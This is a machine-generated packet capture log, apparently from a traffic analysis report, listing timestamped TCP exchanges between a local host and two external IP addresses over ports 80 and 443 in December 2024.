                                                                                                                Dec 16, 2024 07:12:04.664325953 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.664530039 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.664557934 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.664613008 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.670303106 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.670497894 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.670527935 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.670624018 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.676091909 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.676173925 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.676273108 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.676328897 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.681936026 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.682003975 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.682053089 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.682106018 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.687818050 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.687880993 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.687959909 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.688009024 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.693608046 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.693670034 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.693732977 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.693784952 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.699476957 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.699537039 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.699601889 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.699660063 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.703850985 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.703916073 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.703969955 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.704024076 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.708112001 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.708170891 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.708225012 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.708281040 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.710597992 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.710655928 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.710747004 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.710803986 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.713097095 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.713156939 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.713231087 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.713300943 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.715616941 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.715687990 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.715751886 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.715805054 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.718133926 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.718193054 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.718265057 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.718321085 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.720650911 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.720711946 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.720756054 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.720818996 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.723154068 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.723212004 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.723258972 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.723331928 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.725661993 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.725714922 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.725759029 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.725814104 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.728164911 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.728230000 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.728293896 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.728347063 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.730652094 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.730706930 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.730772972 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.730829000 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.733175993 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.733236074 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.733267069 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.733315945 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.735668898 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.735724926 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.735754013 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.735805988 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:09.066292048 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:09.066837072 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:11.416095018 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:30.434179068 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:30.434266090 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:30.434376001 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:30.434998035 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:30.435033083 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:31.665294886 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:31.665488958 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:31.668850899 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:31.668906927 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:31.669348001 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:31.676696062 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:31.719376087 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.099467039 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.099639893 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.099740982 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.099819899 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.099910975 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.099910975 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.099982977 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.100511074 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.107136011 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.115417004 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.115668058 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.115730047 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.168926001 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.168987036 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.215730906 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.219899893 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.262677908 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.262708902 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.294413090 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.294585943 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.294616938 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.304097891 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.304136038 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.304359913 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.304390907 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.304438114 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.310194969 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.318162918 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.318290949 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.318321943 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.326313972 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.326463938 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.326494932 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.334357977 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.334733963 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.334765911 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.342641115 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.342988014 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.343018055 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.358340025 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.358503103 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.358609915 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.358675003 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.358747959 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.364584923 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.371625900 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.371747971 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.371963978 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.372026920 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.372204065 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.377963066 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.410698891 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.410788059 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.410850048 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.465775013 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.483170986 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.486129045 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.486335993 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.486397028 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.498044968 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.498080969 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.498219013 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.498281002 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.498341084 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.511154890 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.511224031 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.511285067 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.511470079 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.517657042 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.517736912 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.531049013 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.531079054 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.531162977 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.543885946 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.544323921 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.544387102 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.544446945 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.546788931 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.546813011 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.546845913 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.552756071 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.552906036 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.552968979 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.553028107 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.558465004 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.558643103 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.564583063 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.564661980 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.567708015 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.567804098 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.573575020 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.573661089 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.576767921 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.576877117 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.582743883 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.582942963 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.588502884 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.588588953 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.674679041 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.674921989 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.675781965 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.675857067 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.682848930 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.682934046 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.688828945 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.689008951 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.691844940 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.691950083 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.697705030 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.697822094 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.700669050 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.700773954 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.705965042 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.706077099 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.710985899 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.711071014 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.715967894 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.716052055 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.718677044 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.718760014 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.723669052 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.723767042 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.726147890 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.726246119 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.730274916 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.730484009 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.733385086 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.733474970 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.735970974 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.736032963 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.739120960 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.739178896 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.742475033 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.742553949 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.744189024 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.744333982 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.747170925 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.747226954 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.748971939 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.749032021 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.752165079 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.752221107 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.755287886 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.755354881 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.794513941 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.794578075 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.795388937 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.795454979 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.798428059 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.798511028 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.870434046 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.870449066 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.870620966 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.870652914 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.870712042 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.880234957 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.880256891 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.880368948 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.880399942 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.891473055 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.891496897 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.891535997 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.891567945 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.891586065 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.902856112 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.902874947 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.902998924 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.903000116 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.903033018 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.912702084 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.912733078 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.912767887 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.912801981 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.912830114 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.922543049 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.922560930 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.922700882 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.922700882 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.922738075 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.928802967 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.928827047 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.928859949 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.928894043 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.928916931 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.935822964 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.935841084 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.935941935 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.935941935 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.935976982 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.981317997 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.063308001 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.063390970 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.063541889 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.063541889 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.063574076 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.063633919 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.069768906 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.069792986 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.070000887 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.070034027 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.070246935 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.075505972 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.075525045 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.075624943 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.075656891 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.075707912 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.081955910 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.081974983 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.082128048 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.082159996 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.082218885 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.088059902 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.088078976 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.088140965 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.088172913 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.088231087 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.094434023 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.094451904 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.094579935 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.094625950 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.094672918 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.100971937 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.100991011 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.101113081 CET49738443192.168.2.4172.67.187.200
